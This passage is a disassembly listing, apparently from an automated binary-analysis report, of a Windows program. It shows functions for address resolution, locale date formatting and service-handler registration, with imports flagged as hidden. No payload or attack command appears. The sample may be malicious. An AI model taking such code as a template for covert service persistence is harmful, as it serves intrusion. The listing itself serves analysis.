004143E9 mov dword ptr [ebp-28h], eax
004143EC mov eax, dword ptr [ebp+08h]
004143EF mov dword ptr [ebp-24h], eax
004143F2 mov dword ptr [ebp-20h], ebx
004143F5 mov dword ptr [ebp-2Ch], 00000001h
004143FC lea eax, dword ptr [ebp-0Ch]
004143FF push eax
00414400 lea eax, dword ptr [ebp-2Ch]
00414403 push eax
00414404 mov eax, dword ptr [ebp-04h]
00414407 call 00404878h
0041440C push eax
0041440D push 00000000h
0041440F call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00414415 test eax, eax
00414417 jne 0041445Bh
00414419 cmp dword ptr [ebp-0Ch], 00000000h
0041441D je 0041445Bh
0041441F mov eax, dword ptr [ebp-0Ch]
00414422 cmp dword ptr [eax+04h], 02h
00414426 jne 0041443Dh
00414428 mov eax, dword ptr [ebp-0Ch]
0041442B mov eax, dword ptr [eax+18h]
0041442E mov ax, word ptr [eax+02h]
00414432 push eax
00414433 call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00414439 mov word ptr [ebp-06h], ax
0041443D mov eax, dword ptr [ebp-0Ch] xrefs 00414426
00414440 cmp dword ptr [eax+04h], 17h
00414444 jne 0041445Bh
00414446 mov eax, dword ptr [ebp-0Ch]
00414449 mov eax, dword ptr [eax+18h]
0041444C mov ax, word ptr [eax+02h]
00414450 push eax
00414451 call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00414457 mov word ptr [ebp-06h], ax
0041445B xor eax, eax xrefs 00414417, 0041441D, 00414444
0041445D pop edx
0041445F pop ecx Count = 2
00414460 mov dword ptr fs:[eax], edx
00414463 push 00414480h
00414468 cmp dword ptr [ebp-0Ch], 00000000h xrefs 0041447E
0041446C je 00414478h
0041446E mov eax, dword ptr [ebp-0Ch]
00414471 push eax
00414472 call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414478 ret xrefs 0041446C function end
Function 00408D74, API count: 2, instr count: 100
APIs
  • GetThreadLocale.KERNEL32, ref: 00408DEC
  • GetDateFormatA.KERNEL32, ref: 00408DF2
Address Instruction Meta Information
00408D74 push ebp xrefs 004091A8
00408D75 mov ebp, esp
00408D77 add esp, FFFFFEE8h
00408D7D push ebx
00408D7E push esi
00408D7F xor ecx, ecx
00408D81 mov dword ptr [ebp-00000118h], ecx
00408D87 mov dword ptr [ebp-04h], ecx
00408D8A mov ebx, edx
00408D8C mov esi, eax
00408D8E xor eax, eax
00408D90 push ebp
00408D91 push 00408EC2h
00408D96 push dword ptr fs:[eax]
00408D99 mov dword ptr fs:[eax], esp
00408D9C mov eax, ebx
00408D9E call 004043DCh
00408DA3 mov eax, dword ptr [ebp+08h]
00408DA6 mov ax, word ptr [eax-0Eh]
00408DAA mov word ptr [ebp-14h], ax
00408DAE mov eax, dword ptr [ebp+08h]
00408DB1 mov ax, word ptr [eax-10h]
00408DB5 mov word ptr [ebp-12h], ax
00408DB9 mov eax, dword ptr [ebp+08h]
00408DBC mov ax, word ptr [eax-12h]
00408DC0 mov word ptr [ebp-0Eh], ax
00408DC4 lea eax, dword ptr [ebp-04h]
00408DC7 mov edx, 00408ED8h
00408DCC call 00404474h
00408DD1 push 00000100h
00408DD6 lea eax, dword ptr [ebp-00000114h]
00408DDC push eax
00408DDD mov eax, dword ptr [ebp-04h]
00408DE0 call 00404878h
00408DE5 push eax
00408DE6 lea eax, dword ptr [ebp-14h]
00408DE9 push eax
00408DEA push 00000004h
00408DEC call 004061ECh GetThreadLocale@KERNEL32.DLL (Hidden Import)
00408DF1 push eax
00408DF2 call 0040618Ch GetDateFormatA@KERNEL32.DLL (Hidden Import)
00408DF7 test eax, eax
00408DF9 je 00408EA1h
00408DFF mov eax, ebx
00408E01 lea edx, dword ptr [ebp-00000114h]
00408E07 mov ecx, 00000100h
00408E0C call 0040464Ch
00408E11 dec esi
00408E12 jne 00408EA1h
00408E18 mov eax, dword ptr [0042C73Ch] 00000009
00408E1D sub eax, 04h
00408E20 je 00408E44h
00408E22 sub eax, 0Dh
00408E25 jne 00408EA1h
00408E27 push ebx
00408E28 mov eax, dword ptr [ebx]
00408E2A mov edx, 00000001h
00408E2F call 0040B320h
00408E34 mov ecx, eax
00408E36 mov eax, dword ptr [ebx]
00408E38 mov edx, 00000001h
00408E3D call 004048D8h
00408E42 jmp 00408EA1h
00408E44 cmp dword ptr [0042C740h], 01h xrefs 00408E20
00408E4B jne 00408EA1h
00408E4D mov eax, dword ptr [ebx]
00408E4F call 00404678h
00408E54 mov edx, eax
00408E56 mov eax, dword ptr [ebx]
00408E58 call 0040B1ACh
00408E5D cmp eax, 04h
00408E60 jne 00408EA1h
00408E62 mov eax, dword ptr [ebx]
00408E64 mov edx, 00000003h
00408E69 call 0040B2BCh
00408E6E mov esi, eax
00408E70 lea eax, dword ptr [ebp-00000114h]
00408E76 add esi, eax
00408E78 dec esi
00408E79 lea eax, dword ptr [ebp-00000118h]
00408E7F mov edx, esi
00408E81 call 004045D4h
00408E86 mov eax, dword ptr [ebp-00000118h]
00408E8C mov edx, 00000002h
00408E91 call 0040B320h
00408E96 mov ecx, eax
00408E98 mov eax, ebx
00408E9A mov edx, esi
00408E9C call 004044CCh
00408EA1 xor eax, eax xrefs 00408DF9, 00408E12, 00408E4B, 00408E60, 00408E25, 00408E42
00408EA3 pop edx
00408EA5 pop ecx Count = 2
00408EA6 mov dword ptr fs:[eax], edx
00408EA9 push 00408EC9h
00408EAE lea eax, dword ptr [ebp-00000118h] xrefs 00408EC7
00408EB4 call 004043DCh
00408EB9 lea eax, dword ptr [ebp-04h]
00408EBC call 004043DCh
00408EC1 ret function end
Function 00429A0C, API count: 5, instr count: 53
APIs
  • RegisterServiceCtrlHandlerA.ADVAPI32, ref: 00429A4C
  • SetServiceStatus.ADVAPI32, ref: 00429A6E
  • CreateThread.KERNEL32, ref: 00429A89
  • WaitForSingleObject.KERNEL32, ref: 00429A9B
  • CloseHandle.KERNEL32, ref: 00429AA6
Address Instruction Meta Information
00429A0C push ebp
00429A0D mov ebp, esp
00429A0F push ecx
00429A10 push ebx
00429A11 mov ebx, 0042CAA4h
00429A16 mov dword ptr [ebx], 00000030h
00429A1C mov dword ptr [ebx+04h], 00000002h
00429A23 xor eax, eax
00429A25 mov dword ptr [ebx+08h], eax
00429A28 xor eax, eax
00429A2A mov dword ptr [ebx+0Ch], eax
00429A2D xor eax, eax
00429A2F mov dword ptr [ebx+10h], eax
00429A32 xor eax, eax
00429A34 mov dword ptr [ebx+14h], eax
00429A37 xor eax, eax
00429A39 mov dword ptr [ebx+18h], eax
00429A3C push 004299F0h
00429A41 mov eax, dword ptr [0042DA9Ch] 009610D0
00429A46 call 00404878h
00429A4B push eax
00429A4C call 00421BBCh RegisterServiceCtrlHandlerA@ADVAPI32.DLL (Hidden Import)
00429A51 mov dword ptr [0042CAC0h], eax
00429A56 mov dword ptr [ebx+04h], 00000004h
00429A5D xor eax, eax
00429A5F mov dword ptr [ebx+14h], eax
00429A62 xor eax, eax
00429A64 mov dword ptr [ebx+18h], eax
00429A67 push ebx
00429A68 mov eax, dword ptr [0042CAC0h] 0014DF20
00429A6D push eax
00429A6E call 00421BB4h SetServiceStatus@ADVAPI32.DLL (Hidden Import)
00429A73 call 00422504h
00429A78 lea eax, dword ptr [ebp-04h]
00429A7B push eax
00429A7E push 00000000h Count = 2
00429A80 push 00429A04h
00429A87 push 00000000h Count = 2
00429A89 call 00421B8Ch CreateThread@KERNEL32.DLL (Hidden Import)
00429A8E mov dword ptr [0042CAA0h], eax
00429A93 push FFFFFFFFh
00429A95 mov eax, dword ptr [0042CAA0h] 00000000
00429A9A push eax
00429A9B call 00421B9Ch WaitForSingleObject@KERNEL32.DLL (Hidden Import)
00429AA0 mov eax, dword ptr [0042CAA0h] 00000000
00429AA5 push eax
00429AA6 call 00421BA4h CloseHandle@KERNEL32.DLL (Hidden Import)
00429AAB pop ebx
00429AAC pop ecx
00429AAD pop ebp
00429AAE retn 000Ch function end